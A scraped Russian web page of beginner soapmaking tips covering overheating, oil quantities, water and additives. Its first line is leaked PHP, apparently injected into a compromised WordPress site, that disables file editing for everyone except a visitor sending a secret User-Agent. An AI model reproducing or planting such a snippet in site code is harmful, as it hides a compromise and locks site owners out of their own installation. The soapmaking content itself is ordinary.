if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Важные советы начинающим мыловарам | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Важные советы начинающим мыловарам

Приступать к самостоятельному изготовлению мыла следует только после того как внимательно познакомитесь с рекомендациями как сделать мыло своими руками. Читайте несколько несложных советов позволит избежать ошибок и неприятных ситуаций

При­сту­пать к само­сто­я­тель­но­му изго­тов­ле­нию мыла сле­ду­ет толь­ко после того как вни­ма­тель­но позна­ко­ми­тесь с реко­мен­да­ци­я­ми как сде­лать мыло сво­и­ми рука­ми. Вот несколь­ко неслож­ных сове­тов поз­во­лит избе­жать оши­бок и непри­ят­ных ситуаций:

  • Преж­де все­го, необ­хо­ди­мо опре­де­лит­ся с тем, что ожи­да­ет­ся в ито­ге. Это пра­ви­ло каса­ет­ся в первую оче­редь новичков.
  • Ино­гда сле­ду­ет сде­лать помет­ки отно­си­тель­но ингре­ди­ен­тов и после­до­ва­тель­но­сти действий.
  • При начав­шем­ся про­цес­се вар­ки нет вре­ме­ни на наве­де­ние спра­вок, дей­ствия долж­ны быть чет­ки­ми и быстрыми.
  • Мыль­ная осно­ва, как пра­ви­ло, засты­ва­ет очень быстро.
  • Пере­грев осно­вы недопустим.
  • При пере­гре­ве осно­ва для мыла мут­не­ет, т.к. теря­ет жид­кость, воз­мож­но появ­ле­ние пузырь­ков и пены, кото­рые так­же сни­жа­ют его качество.
  • Не сле­ду­ет нагре­вать осно­ву для мыла более одно­го раза. Поте­ря жид­ко­сти вли­я­ет на кис­лот­ность мыла.
  • Варить мыло в домаш­них усло­ви­ях луч­ше на водя­ной бане, что дела­ет более под­кон­троль­ным процесс.

Умеренность во всем

Рас­про­стра­нен­ной ошиб­кой боль­шин­ства начи­на­ю­щих мыло­ва­ров явля­ет­ся неуме­рен­ное исполь­зо­ва­ние ингре­ди­ен­тов. Они исхо­дят из прин­ци­па «чем боль­ше, тем луч­ше». Одна­ко, в дан­ном слу­чае необ­хо­ди­мо про­яв­лять уме­рен­ность. Ина­че изли­шек эфир­ных масел высту­пит в осно­ве капель­ка­ми. Общее коли­че­ство всех полез­ных масел сле­ду­ет брать из рас­че­та на 100 гр. не более ½ чай­ной ложки.

Никакой воды

Вода добав­ля­ет­ся толь­ко в тех слу­ча­ях, когда мы гото­вим мыло сво­и­ми рука­ми «с нуля» или исполь­зу­ем дет­ское мыло. В осталь­ных слу­ча­ях добав­лен­ная вода при­ве­дет к помут­не­нию осно­вы, ухуд­шит­ся ее засты­ва­ние. Если есть жела­ние напол­нить мыло целеб­ны­ми свой­ства­ми трав, в рас­топ­лен­ную осно­ву добав­ля­ют не отвар, а бумаж­ный пакет с тра­вой и выдер­жи­ва­ют так 10 минут.

Добавки

Не все­гда вво­ди­мые в осно­ву добав­ки поз­во­ля­ют достичь жела­е­мо­го резуль­та­та. Каж­дая из них про­яв­ля­ет себя по-сво­е­му и это сле­ду­ет помнить.

Плав­ле­нию мыла спо­соб­ству­ют шоко­лад, сахар и мед. Вво­дят их в неболь­шом коли­че­стве. Мыло с эти­ми добав­ка­ми засты­ва­ет немно­го мед­лен­нее. Все добав­ки вво­дят­ся в теп­лую основу.

Поро­шок кори­цы и вани­ли не про­яв­ля­ют в мыле сво­е­го запаха.

Неожи­дан­но и пове­де­ние лепест­ков роз. Добав­лен­ные в мыло они зеле­не­ют. А цвет­ки гибис­ку­са при­об­ре­та­ют серую окраску.

Мож­но при­го­то­вить мыло в домаш­них усло­ви­ях с мор­ской солью. Для это­го соль добав­ля­ют толь­ко при вар­ке мыла с «нуля», когда оста­ет­ся лег­кий след. В дру­гих слу­ча­ях она будет выкри­стал­ли­зо­вы­вать­ся, рас­сла­и­вать осно­ву, услож­нять про­цесс застывания.

Не сле­ду­ет исполь­зо­вать в каче­стве кра­си­те­ля зелен­ку или мар­ган­цов­ку.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!